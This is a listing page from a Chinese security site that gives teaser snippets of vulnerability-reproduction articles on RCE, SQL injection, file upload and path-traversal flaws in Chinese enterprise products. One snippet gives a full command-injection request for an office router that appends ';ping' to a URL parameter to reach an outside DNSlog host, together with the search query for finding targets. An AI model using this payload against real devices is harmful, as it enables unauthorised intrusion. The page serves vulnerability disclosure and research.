漏洞复现 - 第 87 | CN-SEC 中文网

安全漏洞

极企智能办公路由存在RCE漏洞

资产收集 title="极企智能办公路由" 漏洞复现构造url，请求DNSlog /notice/jumper.php?t=;ping%20u0iee.z9z.top 原文始发于微信公众号（Devi...

06月25日27 views评论

阅读全文

安全漏洞

电信网关配置管理系统 del_file.php 前台RCE漏洞 poc

0x01 免责声明免责声明请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性...

06月25日40 views评论

阅读全文

安全漏洞

某在线系统-thinkphp-rce漏洞复现

在线录音管理系统是一款高效、便捷的数字化工具，用于集中管理电话录音数据。该系统支持实时录音、自动存储，并提供多维度查询和快速回放功能。用户可轻松检索录音文件，保障数据安全，并通过加密和权限设置实现严格...

06月24日69 views评论

阅读全文

安全漏洞

医药信息管理系统GetLshByTj 接口处存在SQL注入漏洞

Ⅰ、漏洞描述医药信息管理系统是一种用于管理和存储医疗机构中的药品信息、病人信息、医嘱信息、药品供应信息等的计算机系统医药信息管理系统GetLshByTj 接口处存在SQL注入漏洞，恶...

06月24日70 views评论

阅读全文

安全漏洞

Apache OFBiz 路径遍历导致RCE漏洞

01漏洞描述Apache OFBiz 18.12.14之前版本存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径（请求UR...

06月24日38 views评论

阅读全文

安全漏洞

用友移动管理系统 upload 任意文件上传漏洞

产品简介用友移动系统管理系统是用友公司推出的一款移动办公解决方案，旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。漏洞描述用友移动系统管理 upload 接口存在任意文件上传漏洞，攻击...

06月23日30 views评论

阅读全文

安全漏洞

天喻软件数据安全平台 deviceid 存在SQL注入 poc

一、产品描述武汉天喻软件有限公司专注于为中国制造业企业提供信息化及协同管理、数字化设计、数据安全等软件解决方案和工程咨询服务。这家公司依托国家企业信息化应用支撑软件工程研究中心建立，旨在通过专业的数...

06月23日81 views评论

阅读全文

安全漏洞

电信网关配置管理系统 del_file.php 前台RCE漏洞

01漏洞描述电信网关配置管理系统/manager/newtpl/del_file.php 接口存在命令执行漏洞，未经身份验证的远程攻击者可以利用此漏洞执行任意代码，从而获取服务器权限 0...

06月23日38 views评论

阅读全文

安全漏洞

SpringBoot-GateWay-RCE (CVE-2022-22947) 漏洞复现

免责声明:文章仅用于技术分享，切勿非法测试，由于传播、利用本公众号朱厌安全团队所提供的信息而造成的后果以及损失，均由使用者本人承担，本公众号朱厌安全团队以及作者不为此承担任何责任！如有侵权烦请告知，我...

06月23日24 views评论

阅读全文

安全漏洞

申瓯通信在线录音管理系统 Thinkphp 远程代码执行漏洞

0x01 免责声明免责声明 0x02 产品介绍申瓯通信在线录音管理系统是一款功能强大的录音管理解决方案，旨在满足公司、集团单位在区域分布下对录音数据的集中管理需求。该系...

06月23日54 views评论

阅读全文

安全漏洞

Zyxel-NAS设备 setCookie 远程命令执行漏洞 poc

0x01 免责声明disclaimer请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。信息及工具收...

06月23日43 views评论

阅读全文

安全漏洞

万户-ezOFFICE DownloadServlet 任意文件下载漏洞

产品简介万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。漏洞描...

06月23日35 views评论

阅读全文